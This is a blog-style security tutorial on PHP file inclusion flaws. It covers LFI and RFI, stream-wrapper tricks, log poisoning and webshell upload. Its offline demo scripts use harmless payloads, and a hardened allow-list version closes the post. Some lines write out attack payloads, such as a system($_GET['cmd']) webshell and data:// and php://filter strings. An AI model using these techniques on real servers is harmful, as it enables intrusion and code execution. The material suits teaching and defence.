File Inclusion Vulnerability - 2023/03/18-19


6. File inclusion vulnerabilities

Detailed explanation of the file inclusion web vulnerability

Reference: A comprehensive explanation of the file inclusion vulnerability / What is a file inclusion vulnerability (caker丶's blog, CSDN)

1) Causes of file inclusion vulnerabilities:

File inclusion is a type of code injection: the attacker gets the server to execute a script or code whose source the attacker controls. Any language with an include mechanism (JSP, PHP, ASP and others) can be affected. When the server includes a file through one of these functions without strictly validating where the included file comes from, it can be made to include a malicious file, and the attacker constructs that file to achieve their goal.

Common file inclusion functions are:

PHP: include(), include_once(), require(), require_once(); fopen() and readfile() do not execute the file, but with a user-controlled path they still give arbitrary file read

JSP/Servlet: java.io.File, java.io.FileReader

ASP: include file, include virtual

  • Include: includes and runs the specified file. If the file cannot be included, PHP emits a warning and the rest of the script continues to execute.
  • Require: the only difference from include is the failure behaviour: include keeps running after an error, require stops the script.
  • Include_once: almost the same as include, except that it first checks whether the file has already been included; a file that has been included once is not included again.
  • Require_once: almost the same as require, with the same once-only behaviour as include_once.
  • php.ini: allow_url_fopen=Off disables the URL wrappers (http://, ftp://, ...), so remote files cannot be opened. PHP 4 allowed remote inclusion whenever allow_url_fopen was On. Since PHP 5.2 remote inclusion additionally requires allow_url_include=On, which defaults to Off, so a default PHP 5 or later install permits only local inclusion.

When a file is included with any of the functions above, it is executed as PHP code; the PHP engine does not care what type of file is included. Text outside <?php ... ?> tags is output verbatim and any PHP tags inside the file are parsed and run, so a .jpg, .txt or .log file that contains PHP code is executed exactly like a .php file.

2) Why include files:

Common code is written once in a separate file, and the pages that need it include it.

<?php
// index.php: the page parameter decides which file gets included
if (!empty($_GET['page'])) {
    include $_GET['page'];   // user-controlled path: this is the file inclusion bug
} else {
    include "home.php";
}

1. Submit a URL such as index.php?page=main.php; index.php reads the value of the page parameter ($_GET['page']).

2. If $_GET['page'] is not empty (here it is main.php), include that file.

3. If $_GET['page'] is empty, the else branch runs and home.php is included.

3) How to exploit the vulnerability:

  1. Local file inclusion (LFI)

A vulnerability that lets an attacker open and include local files is called a local file inclusion (LFI) vulnerability.

Local inclusion conditions:

  • The include path is built from a variable the user controls.
  • No php.ini switch is required: allow_url_fopen governs only the URL wrappers (http://, ftp://), so local paths are included even with it Off.

http://hi.baidu.com/m4r10/php/index.php?page=hello.php

If hello.php does not exist, PHP emits a warning, and that warning discloses the absolute path of the script on disk (useful later, for example to locate log files).

  • Through such code, sensitive local files can be read, for example by passing a path with ../ segments that climbs out of the web root to a system file.

If the target host does not restrict file permissions strictly, or Apache runs as a privileged user, the file's contents are returned. If PHP's open_basedir is configured, a Warning such as "open_basedir restriction in effect" comes back instead.

If we can also upload a file, we can upload a one-line webshell (a "one-sentence Trojan"), include it, and then connect to it with Caidao (China Chopper) to obtain a webshell on the site.

4) LFI exploitation techniques

  • Include a file the user uploaded (the one-line webshell above, for example; the extension does not matter because include parses any file as PHP).
  • Include a pseudo-protocol stream such as data:// or php://input (both need allow_url_include=On).
  • Include the PHP session file, after planting PHP code in a session value that gets written to it.
  • Include a log file: send a request that makes the server log a line containing a one-line webshell (for example in the User-Agent header), find the path of the log file, include it so the planted code runs, then connect with Caidao to obtain a webshell.
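The log-file technique above, simulated offline. This is an added example and not code from the original post: a constructed Apache-style access-log line stands in for the real access.log, the log path is a temp file rather than the real /var/log location, and the vulnerable include is the one from section 2. The payload only echoes a string; a real attacker would use something like <?php system($_GET['cmd']); ?>.

```php
<?php
// Added example, not code from the original post: log poisoning simulated
// offline against a constructed access-log file in a temp directory.
// Run: php log_poison_demo.php

$dir = sys_get_temp_dir() . '/lfi-log-demo-' . getmypid();
mkdir($dir, 0700);
$log = "$dir/access.log";   // assumed log path; a real target uses e.g. Apache's access.log

// Step 1: the attacker sends a request whose User-Agent header is PHP code.
// The web server does not interpret it; it just writes the line to the log.
// Single quotes only: Apache writes a literal " in the log as \", which would
// break the payload. This payload is harmless; a real one would be
// <?php system($_GET['cmd']); ?>
$payload = "<?php echo 'payload ran, PHP ' . PHP_VERSION . PHP_EOL; ?>";
$logLine = sprintf(
    '203.0.113.7 - - [18/Mar/2023:10:00:00 +0000] "GET /index.php?page=x HTTP/1.1" 200 512 "-" "%s"' . "\n",
    $payload
);
file_put_contents($log, $logLine);           // constructed log content

// Step 2: the attacker requests index.php?page=<path to the log>.
// Simulated here by filling $_GET directly.
$_GET['page'] = $log;

// The vulnerable code from section 2: the engine does not care that the file
// is a .log. Text before the <?php tag is echoed verbatim, then the tag runs.
ob_start();
if (!empty($_GET['page'])) {
    include $_GET['page'];
} else {
    include 'home.php';
}
$output = ob_get_clean();
echo $output;

unlink($log);
rmdir($dir);
```

The printed output is the raw log prefix followed by the text produced by the planted tag, which is exactly what makes log poisoning work: everything before and after the PHP tag is just noise, and the tag itself executes. Note that nginx escapes double quotes in its log as \x22, so the same single-quote rule applies there.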

5) Remote file inclusion (RFI)

Remote inclusion conditions:

  1. allow_url_include=On and allow_url_fopen=On (allow_url_include has defaulted to Off since PHP 5.2, so RFI is rare on current installs).
  2. The include path is built from a variable the user controls.

6) PHP pseudo-protocols (stream wrappers)

  1. file:// protocol:

file:// accesses the local file system to read local files, and is not affected by allow_url_fopen or allow_url_include.

Usage: file://[absolute path to the file]

  2. php:// protocol:

php:// accesses the various input/output streams. php://filter and php://input are the ones used most often.

  • php://filter: applies a stream filter while reading. Used with include, php://filter/read=convert.base64-encode/resource=index.php returns the source of index.php base64-encoded; without the filter the file would be executed as PHP and its source would never be visible. Reading through php://filter is not gated by allow_url_include.

  • php://input: a read-only stream that returns the raw request body. Setting the include parameter to php://input and sending PHP code in the POST body makes PHP treat that body as the included file and execute it: arbitrary code execution. Unlike php://filter, include of php://input is gated by allow_url_include=On.

  3. zip:// protocol:

zip:// reads a member file inside an archive: zip://[path to archive]#[member name] (the # must be sent as %23 in a URL). Combined with include, the member is executed as PHP, so a PHP file packed into an archive uploaded under any extension (for example .jpg) gives arbitrary code execution. zip:// is not gated by allow_url_include, but it needs the zip extension loaded.

  4. data:// protocol:

Similar to php://input, data:// lets the user supply the stream content inline, for example data://text/plain,<?php phpinfo(); ?> or data://text/plain;base64,[base64 of PHP code]. Combined with include, the stream is executed as PHP: arbitrary code execution. Like php://input, it requires allow_url_include=On.
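The four wrappers from this section exercised locally. This is an added example, not code from the original post: the "secret" config file and the "uploaded" archive are constructed in a temp directory, and the file names are assumptions. php://input is left out because it only carries an HTTP request body (the CLI equivalent is php://stdin).

```php
<?php
// Added example, not code from the original post: file://, php://filter,
// data:// and zip:// against constructed files in a temp directory.
// Run: php wrappers_demo.php
//      php -d allow_url_include=1 wrappers_demo.php   (to see data:// execute)

$dir = sys_get_temp_dir() . '/lfi-wrapper-demo-' . getmypid();
mkdir($dir, 0700);
$config = "$dir/config.php";
file_put_contents($config, "<?php\n\$db_password = 'hunter2';   // constructed secret\n");

// 1. file:// : a plain local read, unaffected by allow_url_fopen/allow_url_include.
echo "[file://]\n", file_get_contents('file://' . $config);

// 2. php://filter : including config.php directly would execute it and show
//    nothing. Through the filter the bytes come back base64-encoded instead,
//    so the source (and the password in it) is exposed.
$b64 = file_get_contents('php://filter/read=convert.base64-encode/resource=' . $config);
echo "[php://filter] ", $b64, "\n";
echo "[decoded]\n", base64_decode($b64);

// 3. data:// : the "file" is the URL itself. include() runs it only when
//    allow_url_include=On; that setting is PHP_INI_SYSTEM, so it cannot be
//    turned on from the script, only from php.ini or -d.
$data = 'data://text/plain;base64,' . base64_encode('<?php echo "code ran via data://\n";');
if (ini_get('allow_url_include')) {
    echo "[data://] ";
    include $data;
} else {
    echo "[data://] include refused: allow_url_include is Off\n";
}

// 4. zip:// : a PHP file hidden in an archive uploaded as an "image". The
//    member is selected after '#'; in a query string it must be sent as %23.
//    zip:// is not gated by allow_url_include, so this works on a default
//    php.ini as long as the zip extension (and its stream wrapper) is loaded.
if (in_array('zip', stream_get_wrappers(), true)) {
    $archive = "$dir/avatar.jpg";
    $zip = new ZipArchive();
    $zip->open($archive, ZipArchive::CREATE);
    $zip->addFromString('shell.php', '<?php echo "code ran via zip://\n";');
    $zip->close();
    echo "[zip://] ";
    include "zip://$archive#shell.php";
    unlink($archive);
} else {
    echo "[zip://] skipped: zip stream wrapper not available\n";
}

unlink($config);
rmdir($dir);
```

Running it once with a default php.ini and once with -d allow_url_include=1 shows the practical difference between the wrappers: file://, php://filter and zip:// work everywhere, while data:// (and php://input) only help the attacker on a server that has explicitly enabled allow_url_include.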

7) File inclusion vulnerability protection

1. Filter dangerous characters (../, :, null bytes) with str_replace or similar. On its own this is weak, since encodings and wrapper names are easy to miss; combine it with the allow-list in item 5.

2. Configure open_basedir to block directory traversal (open_basedir limits the files PHP may open to the specified directory tree).

3. Upgrade PHP to prevent %00 (null byte) truncation; PHP 5.3.4 and later reject include paths that contain a null byte.

4. Rename uploaded files to random names and store them outside the web root, so an attacker cannot predict a path to include.

5. Keep an allow-list of files that may be dynamically included and refuse anything not on it.

6. Separate administrator privileges, manage file permissions, run the web server with least privilege, and keep allow_url_include and allow_url_fopen Off unless the application needs them.
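The vulnerable include from section 2 beside a hardened version that applies items 2, 5 and 6 above. This is an added example, not code from the original post; the pages directory, the page names and the allow-list keys are assumptions for the demonstration.

```php
<?php
// Added example, not code from the original post: allow-list plus directory
// confinement for a dynamic include, demonstrated on constructed pages.
// Run: php hardened_include_demo.php

// Vulnerable: the user supplies a path, and every trick on this page applies
// (../ traversal, php://filter, data://, zip://, log files, uploads).
function pickPageVulnerable(?string $page): string
{
    return !empty($page) ? $page : 'home.php';
}

// Hardened: the user supplies a key, never a path. Empty input falls back to
// home (the original if/else default); unknown keys are refused outright.
function pickPageHardened(?string $key, string $pagesDir, array $allowed): string
{
    if ($key === null || $key === '') {
        $key = 'home';
    }
    if (!array_key_exists($key, $allowed)) {
        throw new RuntimeException("unknown page '$key'");
    }
    $candidate = $pagesDir . DIRECTORY_SEPARATOR . $allowed[$key];

    // Second line of defence in case the allow-list is ever misconfigured:
    // realpath() resolves symlinks and '..', returns false for missing files
    // and for wrapper URLs (php://, data://, zip://), so only a real file
    // below $pagesDir can come out of here.
    $real = realpath($candidate);
    $base = realpath($pagesDir);
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("'$key' resolves outside $pagesDir");
    }
    return $real;
}

// Demo on a constructed pages directory (assumed layout).
$pagesDir = sys_get_temp_dir() . '/lfi-hardened-demo-' . getmypid();
mkdir($pagesDir, 0700);
file_put_contents("$pagesDir/home.php",  "<?php echo 'home page', PHP_EOL;\n");
file_put_contents("$pagesDir/about.php", "<?php echo 'about page', PHP_EOL;\n");
$allowed = ['home' => 'home.php', 'about' => 'about.php'];

$attempts = [
    'about',                                                   // valid key
    '',                                                        // empty -> home
    '../../../../etc/passwd',                                  // traversal
    'php://filter/read=convert.base64-encode/resource=about',  // wrapper
    'about.php',                                               // a path, not a key
];
foreach ($attempts as $in) {
    echo "input '$in'\n";
    echo "  vulnerable would include: ", pickPageVulnerable($in), "\n";
    try {
        $path = pickPageHardened($in, $pagesDir, $allowed);
        echo "  hardened includes: $path -> ";
        include $path;
    } catch (RuntimeException $e) {
        echo "  hardened blocked: ", $e->getMessage(), "\n";
    }
}

array_map('unlink', glob("$pagesDir/*.php"));
rmdir($pagesDir);

// php.ini side of item 6 (cannot be set from the script):
//   allow_url_include = Off                   ; default since PHP 5.2
//   allow_url_fopen   = Off                   ; unless the app really fetches URLs
//   open_basedir      = /var/www/app/:/tmp/   ; item 2: the tree PHP may open (assumed paths)
```

The key design choice is that user input selects an entry in a fixed map rather than naming a file, so filtering characters (item 1) becomes unnecessary for the include path; the realpath check exists only to catch a future mistake in the map, not to validate the user's input.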


Origin blog.csdn.net/m0_53689197/article/details/129657866